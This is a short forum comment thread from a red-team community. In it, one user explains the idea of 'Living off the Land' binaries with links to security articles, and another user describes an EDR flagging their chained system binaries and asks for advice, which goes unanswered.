this post was submitted on 16 Jun 2023
6 points (100.0% liked)
Red Team
445 readers
1 users here now
Red Teamers are here to break into your stuff before the bad guys do, and help you secure it. This is a place to discuss novel research, pentest tools and techniques, physical security and post memes about the Blue Team.
Join us! We have cookies. Blue Team's cookies. >:)
founded 1 year ago
MODERATORS
you are viewing a single comment's thread
view the rest of the comments
view the rest of the comments
So LOL means "Living off the Land" which means basically using whatever is on the system instead of bringing your own tools. There are many binaries on both linux and windows which you can use and are built into the system to download, execute, etc. and they are also legitimate tools which makes it less likely for AV, EDR, etc. to detect while also leveraging existing tools. Keeping track of these binaries are a pain so this nice little website just has everything there which makes it a lot easier.
I don't think I explained well, but here are some articles:
https://res.armor.com/resources/threat-intelligence/living-off-the-land-attacks/
https://www.securityhq.com/blog/security-101-lolbins-malware-exploitation/
https://darktrace.com/blog/living-off-the-land-how-hackers-blend-into-your-environment
There is also "Staying off the Land" and "Bring your own Land". It's really fascinating.
Ah, that makes perfect sense, thanks! Some EDRs will flag system binaries that are not in the "standard" folder, though. I was trying to chain a few binaries together (not for red teaming or anything like that), and S1 flagged and deleted all of them from my folder. It was very frustrating.
Unfortunately, it is a lot of trial and error.
That makes sense. This may be a loaded question, but do you have any suggestions?